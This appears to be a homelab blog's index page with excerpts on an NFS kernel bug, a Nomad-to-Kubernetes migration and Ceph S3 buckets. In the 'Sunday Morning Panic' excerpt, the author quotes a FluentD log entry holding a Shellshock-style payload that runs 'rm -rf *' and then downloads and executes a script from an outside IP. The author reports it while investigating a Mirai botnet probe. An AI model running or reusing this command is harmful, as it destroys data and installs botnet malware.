NFS problems with new Ubuntu 22.04 kernel

Yesterday’s Homelab host update did not go as intended at all. I hit a kernel bug in the NFS code. To describe the problem, I need to go into a bit of detail on my setup, so please bear with me. I’ve got a fleet of eight Raspberry Pi CM4s and a single Udoo x86 II forming the backbone of the compute in my Homelab. All of them netboot, with no per-host storage at all. To be able to do host updates, including kernels, the boot files used for netbooting are separated per host, and each host’s files are mounted to that host’s /boot/firmware dir via NFS. It looks something like this: ...

February 17, 2024 · 6 min · Michael
The HashiCorp Nomad and Kubernetes logos, connected with an arrow pointing from Nomad to Kubernetes

Nomad to k8s, Part 6: Logging with FluentD, Fluentbit and Loki

Wherein I document how I migrated my logging setup from Nomad to k8s. This is part seven of my k8s migration series. Setup overview: Let’s start with an overview of the setup. Figure: Overview of my logging pipeline. ...

February 13, 2024 · 30 min · Michael

Sunday Morning Panic

I just had a slight Sunday morning panic. I finished my logging setup last night and had a look at my FluentD logs this morning to see whether I got any errors or unparsed logs. At the very top of the logs, I got this entry:

error="#<Fluent::Plugin::Parser::ParserError: pattern not matched with data '{ :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://192.3.152.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh'\", \"time\":\"2024-02-11T04:54:25+01:00\"}'>" location= tag=services.traefik.traefik.docker.anon time=1707623665 record="{ \"log\"=>\"{ :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://192.3.152.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh'\\\", \\\"time\\\":\\\"2024-02-11T04:54:25+01:00\\\" }\", \"logsubstream\"=>\"docker\", \"nomad_job_id\"=>\"traefik\", \"nomad_task_name\"=>\"traefik\", \"nomad_node_name\"=>\"anon\"}" message="dump an error event: error_class=Fluent::Plugin::Parser::ParserError error=\"pattern not matched with data '{ :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://192.3.152.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh'\\\", \\\"time\\\":\\\"2024-02-11T04:54:25+01:00\\\"}'\" location=nil tag=\"services.traefik.traefik.docker.anon\" time=2024-02-11 03:54:25.149520221 +0000 record={\"log\"=>\"{ :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://192.3.152.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh'\\\", \\\"time\\\":\\\"2024-02-11T04:54:25+01:00\\\"}\", \"logsubstream\"=>\"docker\", \"nomad_job_id\"=>\"traefik\", \"nomad_task_name\"=>\"traefik\", \"nomad_node_name\"=>\"anon\"}" host=anon level=warning

That looked suspicious, to say the least. After some googling for the nigga.sh file, I landed on this page from Akamai. It describes an attack by the Mirai botnet. ...

February 11, 2024 · 4 min · Michael

Nomad to k8s, Part 2b: Asymmetric Routing

Wherein I ran into some problems with the Cilium BGP routing and firewalls on my OPNsense box. This is the second addendum for Cilium load balancing in my k8s migration series. While working on my S3 bucket migration, I ran into several rather weird problems. After switching my internal wiki over to using the Ceph RGW S3 from my k8s Ceph Rook cluster, I found that the final upload of the generated site to the S3 bucket from which it was served did not work, even though I had all the necessary firewall rules configured. The output I was getting looked like this: ...

February 4, 2024 · 10 min · Michael

Nomad to k8s, Part 5: Non-service S3 Buckets

Wherein I document how I migrated some S3 buckets over to the Ceph Rook cluster and, with that, made it load-bearing. This is part six of my k8s migration series. So why write a post about migrating S3 buckets, and why do it at this point of the Nomad -> k8s migration? In short, it just fit in here very well. I had already planned to make Ceph Rook one of the first services to set up anyway. The logical next step was then to look at what I could migrate over without any other dependencies. And the answer to that was: some non-service S3 buckets. By “non-service” I mean those buckets which are not directly tied to specific services running on the cluster, unlike, for example, Mastodon’s media files bucket or Loki’s log storage bucket. Those I will migrate over with their respective services. ...

January 25, 2024 · 21 min · Michael